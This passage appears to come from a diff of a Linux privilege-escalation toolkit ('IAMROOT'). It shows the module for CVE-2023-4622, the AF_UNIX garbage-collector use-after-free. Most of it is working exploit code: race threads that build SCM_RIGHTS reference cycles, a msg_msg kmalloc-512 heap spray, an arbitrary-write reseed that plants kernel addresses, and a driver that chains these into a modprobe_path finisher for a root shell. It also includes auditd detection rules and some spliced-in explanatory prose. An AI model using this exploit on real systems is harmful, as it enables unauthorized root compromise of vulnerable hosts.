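    msg.msg_iovlen = 1;
    msg.msg_control = u.buf;
    msg.msg_controllen = sizeof u.buf;
    if (recvmsg(sock, &msg, 0) != 1) return -1;

    /* Validate the header before trusting the payload. */
    struct cmsghdr *c = CMSG_FIRSTHDR(&msg);
    if (!c || c->cmsg_level != SOL_SOCKET || c->cmsg_type != SCM_RIGHTS ||
        c->cmsg_len != CMSG_LEN(sizeof(int)))
        return -1;
    int fd;
    memcpy(&fd, CMSG_DATA(c), sizeof(int));
    return fd;
}
```

The received descriptor is a new number in the receiver's table that refers to the same open file description; until it is received, the kernel counts it as in flight, which is the bookkeeping the module header refers to.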
/* Thread A: tight-loop SCM_RIGHTS-cycle + close to drive GC.
*
* Each iteration:
* 1. Build two socketpairs (A=[a0,a1], B=[b0,b1]).
* 2. Send b0 via SCM_RIGHTS over a0 → a1 receives nothing yet (we
* don't recvmsg — that's the point: the fd stays inflight).
* 3. Send a0 via SCM_RIGHTS over b0 → b1 receives nothing yet.
* 4. close() all 4 user-side fds. Now both endpoints are unreachable
* from userspace BUT each is referenced from the other's skb
* queue → reference cycle → next unix_gc() pass collects them.
*
* The kernel's GC heuristic kicks when the inflight count exceeds
* the count of file refs in the system; closing the user-side fds in
* a tight loop reliably triggers it. */
static void *race_thread_a(void *arg)
{
(void)arg;
pin_to_cpu(0);
while (atomic_load_explicit(&g_race_running, memory_order_acquire)) {
int pa[2], pb[2];
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, pa) < 0) {
atomic_fetch_add_explicit(&g_thread_a_errs, 1, memory_order_relaxed);
sched_yield();
continue;
}
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, pb) < 0) {
close(pa[0]); close(pa[1]);
atomic_fetch_add_explicit(&g_thread_a_errs, 1, memory_order_relaxed);
sched_yield();
continue;
}
/* Cycle: send pb[0] over pa, send pa[0] over pb. We also send
* pb[1]/pa[1] alongside to widen the inflight count per cycle
* (the GC trigger heuristic compares inflight vs total file
* refs — more inflight per cycle == earlier GC). */
int fds_a[AFUG_SCM_FDS_PER_MSG] = { pb[0], pb[1], pb[0] };
int fds_b[AFUG_SCM_FDS_PER_MSG] = { pa[0], pa[1], pa[0] };
(void)send_scm_rights(pa[0], fds_a, AFUG_SCM_FDS_PER_MSG);
(void)send_scm_rights(pb[0], fds_b, AFUG_SCM_FDS_PER_MSG);
/* Close the user-side fds. The kernel-side refs are now only
* held via the inflight skbs — perfect reference cycle for
* the GC to find. */
close(pa[0]); close(pa[1]);
close(pb[0]); close(pb[1]);
atomic_fetch_add_explicit(&g_thread_a_iters, 1, memory_order_relaxed);
}
return NULL;
}
/* Thread B: independent SCM_RIGHTS traffic on a held pair to keep
* the GC scan list churning while Thread A creates new candidates.
*
* Holds a long-lived socketpair and repeatedly sends + recvs SCM_RIGHTS
* with random fds (dup'd from /dev/null). This drives the GC's "scan
* list" rebuild path concurrently with Thread A's frees — the race
* window that fires the UAF is exactly here.
*
* We don't directly call unix_gc() — there's no userspace knob — but
* the GC heuristic is inflight-count driven, and Thread A's cycle
* loop pushes that count past the threshold within a few thousand
* iterations. */
static void *race_thread_b(void *arg)
{
(void)arg;
pin_to_cpu(1);
/* Long-lived pair for the perturbation loop. */
int held[2];
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, held) < 0) {
return NULL;
}
/* Spare fd source — /dev/null dups are harmless to pass. */
int devnull = open("/dev/null", O_RDWR);
if (devnull < 0) {
close(held[0]); close(held[1]);
return NULL;
}
while (atomic_load_explicit(&g_race_running, memory_order_acquire)) {
int fds[AFUG_SCM_FDS_PER_MSG];
for (int i = 0; i < AFUG_SCM_FDS_PER_MSG; i++) {
fds[i] = dup(devnull);
}
(void)send_scm_rights(held[0], fds, AFUG_SCM_FDS_PER_MSG);
for (int i = 0; i < AFUG_SCM_FDS_PER_MSG; i++) {
if (fds[i] >= 0) close(fds[i]);
}
/* Drain the recv side so the held pair doesn't backpressure. */
char drain[16];
char ctrl[CMSG_SPACE(sizeof(int) * AFUG_SCM_FDS_PER_MSG)];
struct iovec iov = { .iov_base = drain, .iov_len = sizeof drain };
struct msghdr msg = {0};
msg.msg_iov = &iov; msg.msg_iovlen = 1;
msg.msg_control = ctrl; msg.msg_controllen = sizeof ctrl;
if (recvmsg(held[1], &msg, MSG_DONTWAIT) > 0) {
/* Close any fds we received so we don't leak. */
for (struct cmsghdr *c = CMSG_FIRSTHDR(&msg); c;
c = CMSG_NXTHDR(&msg, c)) {
if (c->cmsg_level == SOL_SOCKET && c->cmsg_type == SCM_RIGHTS) {
int nfd = (c->cmsg_len - CMSG_LEN(0)) / sizeof(int);
int *rfds = (int *)CMSG_DATA(c);
for (int j = 0; j < nfd; j++)
if (rfds[j] >= 0) close(rfds[j]);
}
}
}
atomic_fetch_add_explicit(&g_thread_b_iters, 1, memory_order_relaxed);
}
close(devnull);
close(held[0]); close(held[1]);
return NULL;
}
/* ---- msg_msg cross-cache spray for kmalloc-512 ------------------- */
static int spray_kmalloc_512(int queues[AFUG_SPRAY_QUEUES])
{
struct ipc_payload p;
memset(&p, 0, sizeof p);
p.mtype = 0x55; /* 'U' — unix */
memset(p.buf, 0x55, sizeof p.buf);
memcpy(p.buf, "IAMROOTU", 8);
int created = 0;
for (int i = 0; i < AFUG_SPRAY_QUEUES; i++) {
int q = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
if (q < 0) { queues[i] = -1; continue; }
queues[i] = q;
created++;
for (int j = 0; j < AFUG_SPRAY_PER_QUEUE; j++) {
if (msgsnd(q, &p, sizeof p.buf, IPC_NOWAIT) < 0) break;
}
}
return created;
}
static void drain_kmalloc_512(int queues[AFUG_SPRAY_QUEUES])
{
for (int i = 0; i < AFUG_SPRAY_QUEUES; i++) {
if (queues[i] >= 0) msgctl(queues[i], IPC_RMID, NULL);
}
}
/* Read /proc/slabinfo for kmalloc-512 active count. Used as the
 * primary empirical witness: a successful UAF + refill perturbs
 * this counter in a way that's distinguishable from idle drift. */
static long slab_active_kmalloc_512(void)
{
    FILE *f = fopen("/proc/slabinfo", "r");
    if (!f) return -1;
    char line[512];
    long active = -1;
    while (fgets(line, sizeof line, f)) {
        if (strncmp(line, "kmalloc-512 ", 12) == 0) {
            char name[64];
            long act = 0, num = 0;
            if (sscanf(line, "%63s %ld %ld", name, &act, &num) >= 2) {
                active = act;
            }
            break;
        }
    }
    fclose(f);
    return active;
}
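The parsing step in `slab_active_kmalloc_512()` can be separated from the file access so it is testable on any host. The sketch below parses a single slabinfo-style line. `demo_slab_active()` is a hypothetical helper, and the sample line layout assumes the usual `name active_objs num_objs ...` column order.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Return the active-object count from one /proc/slabinfo-style line
 * if its cache name is exactly `cache`; otherwise return -1. */
static long demo_slab_active(const char *line, const char *cache)
{
    assert(line != NULL && cache != NULL);
    char name[64];
    long active = 0;
    if (sscanf(line, "%63s %ld", name, &active) != 2) return -1;
    if (strcmp(name, cache) != 0) return -1;
    return active;
}
```

Two caveats are worth keeping in mind when reading the counter as a witness. On many current kernels `/proc/slabinfo` is readable only by root, so an unprivileged caller should expect the `fopen()` in the function above to fail and the result to be -1. And on kernels that split accounted allocations into separate `kmalloc-cg-*` caches, the interesting counter may live under a different cache name, which is why the sketch takes the name as a parameter.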
/* ---- Arb-write primitive (FALLBACK depth) ------------------------
*
* The shared modprobe_path finisher calls back here once per kernel
* write. For AF_UNIX GC race we cannot deliver a deterministic
* arb-write — the underlying race wins on a small fraction of runs
* even with a 30 s budget, and even when the race wins our spray-only
* groom has nowhere near the precision of Lin Ma's multi-stage public
* PoC (which crafts a fake unix_sock whose `peer` pointer steers a
* subsequent SCM_RIGHTS dispatch into the kaddr we want written).
*
* Honest depth: FALLBACK. Each invocation:
* 1. Re-seeds the kmalloc-512 spray with payloads tagged with
* `kaddr` packed at strided offsets (so wherever the UAF reclaim
* lands attacker-controlled bytes inside the freed unix_sock,
* our kaddr appears at the field offset).
* 2. Re-runs the race threads for the extended full-chain budget.
* 3. Returns 0 — we cannot in-process verify the write landed. The
* shared finisher's 3 s sentinel file check is the empirical
* arbiter: on the overwhelmingly common no-land outcome it
* returns EXPLOIT_FAIL gracefully. */
struct af_unix_gc_arb_ctx {
int *queues;
int n_queues;
int arb_calls;
};
static int af_unix_gc_reseed_kaddr_spray(int queues[AFUG_SPRAY_QUEUES],
uintptr_t kaddr,
const void *buf, size_t len)
{
struct ipc_payload p;
memset(&p, 0, sizeof p);
p.mtype = 0x52; /* 'R' — arb-write reseed (distinct from groom 0x55) */
memset(p.buf, 0x52, sizeof p.buf);
memcpy(p.buf, "IAMU4ARB", 8);
/* Plant kaddr at strided slots so wherever the kernel's UAF
* follows a ptr in the refilled chunk, one of these is read.
* unix_sock has multiple pointer fields (peer, link, scm_stat,
* etc.) — strided coverage hits whichever one the UAF dispatch
* dereferences. */
for (size_t off = 0x10; off + sizeof(uintptr_t) <= sizeof p.buf;
off += 0x18) {
memcpy(p.buf + off, &kaddr, sizeof(uintptr_t));
}
/* Caller's bytes immediately after the cookie so any path that
* reads payload data (rather than a chased pointer) finds the
* requested write contents inline. */
size_t copy = len;
if (copy > sizeof p.buf - 16) copy = sizeof p.buf - 16;
if (buf && copy) memcpy(p.buf + 8 + sizeof(uintptr_t), buf, copy);
int touched = 0;
for (int i = 0; i < AFUG_SPRAY_QUEUES && touched < 6; i++) {
if (queues[i] < 0) continue;
if (msgsnd(queues[i], &p, sizeof p.buf, IPC_NOWAIT) == 0) touched++;
}
return touched;
}
static int af_unix_gc_arb_write(uintptr_t kaddr,
const void *buf, size_t len,
void *ctx_v)
{
struct af_unix_gc_arb_ctx *c = (struct af_unix_gc_arb_ctx *)ctx_v;
if (!c || !c->queues || c->n_queues == 0) return -1;
c->arb_calls++;
fprintf(stderr, "[*] af_unix_gc: arb_write attempt #%d kaddr=0x%lx len=%zu "
"(FALLBACK — race-dependent)\n",
c->arb_calls, (unsigned long)kaddr, len);
int seeded = af_unix_gc_reseed_kaddr_spray(c->queues, kaddr, buf, len);
if (seeded == 0) {
fprintf(stderr, "[-] af_unix_gc: arb_write: kaddr-tagged reseed produced 0 msgs\n");
} else {
fprintf(stderr, "[*] af_unix_gc: arb_write: reseeded %d msg_msg slots\n",
seeded);
}
/* Re-run the race with the extended budget. */
atomic_store(&g_race_running, 1);
atomic_store(&g_thread_a_iters, 0);
atomic_store(&g_thread_b_iters, 0);
atomic_store(&g_thread_a_errs, 0);
pthread_t ta, tb;
bool a_ok = pthread_create(&ta, NULL, race_thread_a, NULL) == 0;
bool b_ok = a_ok &&
pthread_create(&tb, NULL, race_thread_b, NULL) == 0;
if (!a_ok || !b_ok) {
atomic_store(&g_race_running, 0);
if (a_ok) pthread_join(ta, NULL);
fprintf(stderr, "[-] af_unix_gc: arb_write: pthread_create failed\n");
return -1;
}
sleep(AFUG_RACE_FULLCHAIN_BUDGET);
atomic_store(&g_race_running, 0);
pthread_join(ta, NULL);
pthread_join(tb, NULL);
uint64_t a_iters = atomic_load(&g_thread_a_iters);
uint64_t b_iters = atomic_load(&g_thread_b_iters);
fprintf(stderr, "[*] af_unix_gc: arb_write: extended race A=%llu B=%llu\n",
(unsigned long long)a_iters,
(unsigned long long)b_iters);
/* Cannot in-process verify the write — let the finisher's sentinel
* arbitrate. */
return 0;
}
/* ---- Exploit driver ---------------------------------------------- */
static iamroot_result_t af_unix_gc_exploit_linux(const struct iamroot_ctx *ctx)
{
/* 1. Refuse-gate: re-call detect() and short-circuit. */
iamroot_result_t pre = af_unix_gc_detect(ctx);
if (pre == IAMROOT_OK) {
fprintf(stderr, "[+] af_unix_gc: kernel not vulnerable; refusing exploit\n");
return IAMROOT_OK;
}
if (pre != IAMROOT_VULNERABLE) {
fprintf(stderr, "[-] af_unix_gc: detect() did not confirm a vulnerable kernel (rc=%d); refusing\n",
(int)pre);
return pre;
}
if (geteuid() == 0) {
fprintf(stderr, "[i] af_unix_gc: already root — nothing to escalate\n");
return IAMROOT_OK;
}
/* Full-chain pre-check: resolve offsets BEFORE the race fork. If
* modprobe_path is unresolvable we refuse here rather than running
* a 30 s race that has no finisher to call. */
struct iamroot_kernel_offsets off;
bool full_chain_ready = false;
if (ctx->full_chain) {
memset(&off, 0, sizeof off);
iamroot_offsets_resolve(&off);
if (!iamroot_offsets_have_modprobe_path(&off)) {
iamroot_finisher_print_offset_help("af_unix_gc");
fprintf(stderr, "[-] af_unix_gc: --full-chain requested but "
"modprobe_path offset unresolved; refusing\n");
fprintf(stderr, "[i] af_unix_gc: even with offsets, race-win rate is\n"
" a small fraction per run — see module header.\n");
return IAMROOT_EXPLOIT_FAIL;
}
iamroot_offsets_print(&off);
full_chain_ready = true;
fprintf(stderr, "[i] af_unix_gc: --full-chain ready — race budget extends\n"
" to %d s. RELIABILITY remains race-dependent on a real\n"
" vulnerable kernel. The finisher's 3 s sentinel timeout\n"
" catches no-land outcomes gracefully.\n",
AFUG_RACE_FULLCHAIN_BUDGET);
}
if (!ctx->json) {
fprintf(stderr, "[*] af_unix_gc: forking exploit child (SCM_RIGHTS cycle "
"race harness%s)\n",
ctx->full_chain ? " + full-chain finisher" : "");
}
signal(SIGPIPE, SIG_IGN);
pid_t child = fork();
if (child < 0) { perror("fork"); return IAMROOT_TEST_ERROR; }
if (child == 0) {
/* 2. Groom: pre-populate kmalloc-512 with msg_msg payloads
* BEFORE the race so the freed unix_sock slot gets recycled
* with attacker-controlled bytes when the bug fires. */
int queues[AFUG_SPRAY_QUEUES] = {0};
for (int i = 0; i < AFUG_SPRAY_QUEUES; i++) queues[i] = -1;
int n_queues = spray_kmalloc_512(queues);
if (n_queues == 0) {
fprintf(stderr, "[-] af_unix_gc: msg_msg spray produced 0 queues "
"(sysv IPC restricted?)\n");
_exit(23);
}
if (!ctx->json) {
fprintf(stderr, "[*] af_unix_gc: kmalloc-512 spray seeded %d queues x %d msgs\n",
n_queues, AFUG_SPRAY_PER_QUEUE);
}
long slab_pre = slab_active_kmalloc_512();
/* 3. Run the race for a bounded time budget. */
atomic_store(&g_race_running, 1);
atomic_store(&g_thread_a_iters, 0);
atomic_store(&g_thread_b_iters, 0);
atomic_store(&g_thread_a_errs, 0);
pthread_t ta, tb;
if (pthread_create(&ta, NULL, race_thread_a, NULL) != 0 ||
pthread_create(&tb, NULL, race_thread_b, NULL) != 0) {
fprintf(stderr, "[-] af_unix_gc: pthread_create failed\n");
atomic_store(&g_race_running, 0);
drain_kmalloc_512(queues);
_exit(24);
}
sleep(AFUG_RACE_TIME_BUDGET);
atomic_store(&g_race_running, 0);
pthread_join(ta, NULL);
pthread_join(tb, NULL);
long slab_post = slab_active_kmalloc_512();
uint64_t a_iters = atomic_load(&g_thread_a_iters);
uint64_t b_iters = atomic_load(&g_thread_b_iters);
uint64_t a_errs = atomic_load(&g_thread_a_errs);
/* 4. Empirical witness breadcrumb. */
FILE *log = fopen("/tmp/iamroot-af_unix_gc.log", "w");
if (log) {
fprintf(log,
"af_unix_gc race harness (CVE-2023-4622):\n"
" thread_a_iters = %llu (SCM_RIGHTS cycle + close)\n"
" thread_b_iters = %llu (SCM_RIGHTS perturb)\n"
" thread_a_errors = %llu (socketpair / send failures)\n"
" slab_kmalloc512_pre = %ld\n"
" slab_kmalloc512_post = %ld\n"
" slab_delta = %ld\n"
" spray_queues = %d\n"
" spray_per_queue = %d\n"
" race_budget_secs = %d\n"
"Note: this run did NOT attempt cred overwrite. The bug is a\n"
"slab UAF with no in-process leak primitive; per-kernel offsets\n"
"for unix_sock layout aren't baked. See module .c for the\n"
"continuation roadmap (Lin Ma fake-peer plant).\n",
(unsigned long long)a_iters,
(unsigned long long)b_iters,
(unsigned long long)a_errs,
slab_pre, slab_post,
(slab_post >= 0 && slab_pre >= 0) ? (slab_post - slab_pre) : 0,
n_queues, AFUG_SPRAY_PER_QUEUE,
AFUG_RACE_TIME_BUDGET);
fclose(log);
}
if (!ctx->json) {
fprintf(stderr, "[*] af_unix_gc: race ran for %ds — A=%llu B=%llu A_errs=%llu\n",
AFUG_RACE_TIME_BUDGET,
(unsigned long long)a_iters,
(unsigned long long)b_iters,
(unsigned long long)a_errs);
fprintf(stderr, "[*] af_unix_gc: kmalloc-512 active: pre=%ld post=%ld\n",
slab_pre, slab_post);
}
/* Hold the spray briefly so the kernel observes refilled slots
* during any in-flight RCU grace periods that started during
* the race. */
usleep(200 * 1000);
/* 5. --full-chain finisher (FALLBACK depth). */
if (full_chain_ready) {
struct af_unix_gc_arb_ctx arb_ctx = {
.queues = queues,
.n_queues = AFUG_SPRAY_QUEUES,
.arb_calls = 0,
};
int fr = iamroot_finisher_modprobe_path(&off,
af_unix_gc_arb_write,
&arb_ctx,
!ctx->no_shell);
FILE *fl = fopen("/tmp/iamroot-af_unix_gc.log", "a");
if (fl) {
fprintf(fl, "full_chain finisher rc=%d arb_calls=%d\n",
fr, arb_ctx.arb_calls);
fclose(fl);
}
drain_kmalloc_512(queues);
if (fr == IAMROOT_EXPLOIT_OK) _exit(34); /* root popped */
_exit(35); /* finisher ran, no land */
}
drain_kmalloc_512(queues);
/* 6. Continuation roadmap — what would land EXPLOIT_OK.
*
* TODO(leak): replace a spray queue with msgrcv(..., MSG_COPY|
* IPC_NOWAIT) probes and scan the returned buffer for non-
* cookie bytes. A freed unix_sock that's refilled by msg_msg
* after a partial overwrite would leak kernel pointers
* (peer, scm_stat, list_node prev/next) into the readback.
* Recover {kbase, init_task} via that leak.
*
* TODO(write): with kbase known, plant a fake unix_sock
* whose `peer` pointer references &current->cred — the
* next SCM_RIGHTS dispatch through the freed slot writes
* a controlled value into that location. Crafting the
* fake unix_sock requires offset of unix_sock fields per
* kernel build (different across LTS branches).
*
* TODO(overwrite): land &init_cred over current->cred so
* the next permission check sees uid==0.
*
* None of these are implemented today. Exit 30 = "trigger
* ran cleanly, no escalation".
*/
_exit(30);
}
/* PARENT */
int status = 0;
pid_t w = waitpid(child, &status, 0);
if (w < 0) { perror("waitpid"); return IAMROOT_TEST_ERROR; }
if (WIFSIGNALED(status)) {
int sig = WTERMSIG(status);
if (!ctx->json) {
fprintf(stderr, "[!] af_unix_gc: race child killed by signal %d "
"(consistent with UAF firing under KASAN)\n", sig);
fprintf(stderr, "[~] af_unix_gc: empirical signal recorded; no cred\n"
" overwrite primitive — NOT claiming EXPLOIT_OK.\n"
" See /tmp/iamroot-af_unix_gc.log + dmesg for witnesses.\n");
}
return IAMROOT_EXPLOIT_FAIL;
}
if (!WIFEXITED(status)) {
fprintf(stderr, "[-] af_unix_gc: child terminated abnormally (status=0x%x)\n",
status);
return IAMROOT_EXPLOIT_FAIL;
}
int rc = WEXITSTATUS(status);
if (rc == 23 || rc == 24) return IAMROOT_PRECOND_FAIL;
if (rc == 34) {
if (!ctx->json) {
fprintf(stderr, "[+] af_unix_gc: --full-chain finisher reported "
"EXPLOIT_OK (race won + write landed)\n");
}
return IAMROOT_EXPLOIT_OK;
}
if (rc == 35) {
if (!ctx->json) {
fprintf(stderr, "[~] af_unix_gc: --full-chain finisher ran; race did not\n"
" win + land within budget (expected outcome on most\n"
" runs — race wins are a fraction of a percent).\n");
}
return IAMROOT_EXPLOIT_FAIL;
}
if (rc != 30) {
fprintf(stderr, "[-] af_unix_gc: child failed at stage rc=%d\n", rc);
return IAMROOT_EXPLOIT_FAIL;
}
if (!ctx->json) {
fprintf(stderr, "[*] af_unix_gc: race harness ran to completion.\n");
fprintf(stderr, "[~] af_unix_gc: read/write/cred-overwrite primitives NOT\n"
" implemented (per-kernel offsets; see module .c TODO\n"
" blocks). Returning EXPLOIT_FAIL per verified-vs-claimed.\n");
}
return IAMROOT_EXPLOIT_FAIL;
}
#endif /* __linux__ */
static iamroot_result_t af_unix_gc_exploit(const struct iamroot_ctx *ctx)
{
if (!ctx->authorized) {
fprintf(stderr, "[-] af_unix_gc: --exploit requires --i-know; refusing\n");
return IAMROOT_PRECOND_FAIL;
}
#ifdef __linux__
return af_unix_gc_exploit_linux(ctx);
#else
(void)ctx;
fprintf(stderr, "[-] af_unix_gc: Linux-only module; cannot run on this host\n");
return IAMROOT_PRECOND_FAIL;
#endif
}
/* ---- Cleanup ----------------------------------------------------- */
static iamroot_result_t af_unix_gc_cleanup(const struct iamroot_ctx *ctx)
{
if (!ctx->json) {
fprintf(stderr, "[*] af_unix_gc: cleaning up race-harness breadcrumb\n");
}
/* Best-effort removal: a missing or undeletable breadcrumb is harmless. */
(void)unlink("/tmp/iamroot-af_unix_gc.log");
/* Race threads + msg queues live inside the now-exited child;
* nothing else to drain. */
return IAMROOT_OK;
}
/* ---- Detection rules --------------------------------------------- */
static const char af_unix_gc_auditd[] =
"# AF_UNIX GC race UAF (CVE-2023-4622) — auditd detection rules\n"
"# The trigger is a tight loop of socketpair(AF_UNIX) + sendmsg with\n"
"# SCM_RIGHTS passing inflight fds, followed by close. Each call is\n"
"# benign — flag the *frequency* by correlating these keys with a\n"
"# subsequent KASAN message in dmesg.\n"
"-a always,exit -F arch=b64 -S socketpair -F a0=0x1 -k iamroot-afunixgc-pair\n"
"-a always,exit -F arch=b64 -S sendmsg -k iamroot-afunixgc-sendmsg\n"
"-a always,exit -F arch=b64 -S msgsnd -k iamroot-afunixgc-spray\n";
const struct iamroot_module af_unix_gc_module = {
.name = "af_unix_gc",
.cve = "CVE-2023-4622",
.summary = "AF_UNIX garbage-collector race UAF (Lin Ma) — kmalloc-512 slab UAF",
.family = "af_unix",
.kernel_range = "K < 6.5; backports: 4.14.326 / 4.19.295 / 5.4.257 / 5.10.197 / 5.15.130 / 6.1.51",
.detect = af_unix_gc_detect,
.exploit = af_unix_gc_exploit,
.mitigate = NULL,
.cleanup = af_unix_gc_cleanup,
.detect_auditd = af_unix_gc_auditd,
.detect_sigma = NULL,
.detect_yara = NULL,
.detect_falco = NULL,
};
void iamroot_register_af_unix_gc(void)
{
iamroot_register(&af_unix_gc_module);
}
@@ -0,0 +1,12 @@
/*
* af_unix_gc_cve_2023_4622 — IAMROOT module registry hook
*/
#ifndef AF_UNIX_GC_IAMROOT_MODULES_H
#define AF_UNIX_GC_IAMROOT_MODULES_H
#include "../../core/module.h"
extern const struct iamroot_module af_unix_gc_module;
#endif
File diff suppressed because it is too large
@@ -0,0 +1,12 @@
/*
* nft_fwd_dup_cve_2022_25636 — IAMROOT module registry hook
*/
#ifndef NFT_FWD_DUP_IAMROOT_MODULES_H
#define NFT_FWD_DUP_IAMROOT_MODULES_H
#include "../../core/module.h"
extern const struct iamroot_module nft_fwd_dup_module;
#endif
File diff suppressed because it is too large
@@ -0,0 +1,12 @@
/*
* nft_payload_cve_2023_0179 IAMROOT module registry hook
*/
#ifndef NFT_PAYLOAD_IAMROOT_MODULES_H
#define NFT_PAYLOAD_IAMROOT_MODULES_H
#include "../../core/module.h"
extern const struct iamroot_module nft_payload_module;
#endif
File diff suppressed because it is too large
@@ -0,0 +1,12 @@
/*
* nft_set_uaf_cve_2023_32233 IAMROOT module registry hook
*/
#ifndef NFT_SET_UAF_IAMROOT_MODULES_H
#define NFT_SET_UAF_IAMROOT_MODULES_H
#include "../../core/module.h"
extern const struct iamroot_module nft_set_uaf_module;
#endif